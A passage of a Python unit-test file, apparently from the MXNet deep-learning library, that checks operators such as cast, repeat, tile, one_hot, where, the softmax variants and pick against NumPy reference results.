assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9 ,11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
if ax not in bcst_dims :
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
